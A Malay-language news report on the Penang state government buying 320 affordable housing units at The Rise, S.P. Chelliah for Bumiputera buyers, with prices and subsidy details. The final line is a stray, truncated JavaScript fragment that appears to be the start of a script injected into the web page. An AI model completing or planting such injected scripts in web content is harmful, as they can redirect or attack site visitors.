320 unit RMM Jenis B (KSR) S. P. Chelliah khas untuk Bumiputera P. Pinang

Oleh : NORSHAHIDA YUSOFF

GEORGE TOWN – Pembelian 320 unit Rumah Mampu Milik (RMM) Jenis B (Kos Sederhana Rendah, KSR) di The Rise, S.P. Chelliah oleh Kerajaan Negeri melalui Akaun Amanah Perumahan Bumiputera Pulau Pinang adalah atas inisiatif untuk memberi keselesaan kepada rakyat Bumiputera negeri ini.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng berkata, sebagai galakan terutamanya kepada Bumiputera untuk memiliki kediaman di tengahtengah kawasan bandar, Kerajaan Negeri melalui Akaun Amanah Perumahan Bumiputera Pulau Pinang memperuntukkan sejumlah wang bagi membeli lebih daripada 30 peratus kuota peruntukan yang ditetapkan untuk lot Bumiputera projek tersebut.

“Untuk tujuan ini, peruntukan sejumlah RM44.6 juta dari akaun tersebut digunakan untuk membeli 320 daripada 770 unit KSR Jenis B daripada pihak pemaju, Tetuan Zubicon Sdn. Bhd. (Zubicon).

“Walau bagaimanapun, daripada jumlah (harga) sebenar pembinaan seunit KSR di pasaran iaitu RM140,000, hanya bayaran sebanyak RM72,500 seunit bagi 320 KSR dengan jumlah RM23.2 juta sahaja akan dibayar kepada pihak pemaju. Bakinya, adalah sebagai sumbangan yang ditanggung oleh mereka.

“Manakala, baki RM67,500 bagi 320 KSR ini yang berjumlah RM21.6 juta akan diberikan kepada Majlis Bandaraya Pulau Pinang (MBPP) sebagai sumbangan bagi menampung kerugian mereka menyerahkan tanah untuk pemajuan projek tersebut,” ujarnya.

Beliau berkata demikian ketika hadir menyaksikan Majlis Menandatangani Perjanjian (MoU) Jual Beli 320 Unit RMM Untuk Bumiputera di The Rise, S.P. Chelliah di sini baru-baru ini.

Pada majlis menandatangani perjanjian itu, Akaun Amanah Perumahan Bumiputera Negeri Pulau Pinang diwakili Setiausaha Kerajaan Negeri, Dato’ Seri Farizan Darus dan MBPP diwakili oleh Perbadanan Pembangunan Pulau Pinang (PDC) selaku Pentadbir Projek, Datuk Rosli Jaafar (Pengurus Besar PDC).

Manakala, Zubicon diwakili Pengarahnya, Lim Beng Keong. Hadir sama, Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon; Exco Perancangan Bandar & Desa dan Perumahan, Jagdeep Singh Deo dan barisan kepimpinan Kerajaan Negeri.

Mengulas lanjut, Guan Eng memberitahu, harga seunit termasuk satu tempat letak kereta yang dijual kepada pembeli sepatutnya adalah RM100,000, iaitu RM72,500 untuk unit KSR dan RM27,500 bagi satu tempat letak kereta.

“Namun, Kerajaan Negeri telah menyerap RM27,500 dan memberikannya sebagai subsidi istimewa kepada bakal pembeli 320 unit KSR ini yang dikhaskan untuk golongan Bumiputera sahaja, dan ia tidak akan dilepaskan sekiranya tidak dapat dijual, sebaliknya tetap akan disimpan.

“Hasil pembayaran daripada jualan ini akan dipulangkan semula ke dalam akaun berkenaan.

“Ini bukan amalan (kerajaan) dulu, yang mana wang pembayaran oleh pembeli tidak dipulangkan semula.

“Tetapi kini, Kerajaan Negeri Pulau Pinang akan memulangkan semula pembayaran sepenuhnya (RM72,500) oleh pembeli ke dalam akaun berkenaan agar dapat digunakan semula dan beri manfaat kepada pembeli lain pada masa depan,” jelasnya.

Pembangunan The Rise, S.P. Chelliah di atas tanah seluas 11.04 ekar melibatkan pembinaan 2,093 unit RMM yang terdiri daripada 770 unit KSR dengan keluasan lantai 700 kaki persegi ditawarkan pada harga RM72,500 seunit.

Diikuti 883 unit berkeluasan 800 kaki persegi dengan harga jualan RM200,000; 165 unit (900 kaki persegi, harga jualan RM300,000) dan 275 unit (1,000 kaki persegi, harga jualan RM400,000).

var d=document;var s=d.createElement(‘script’);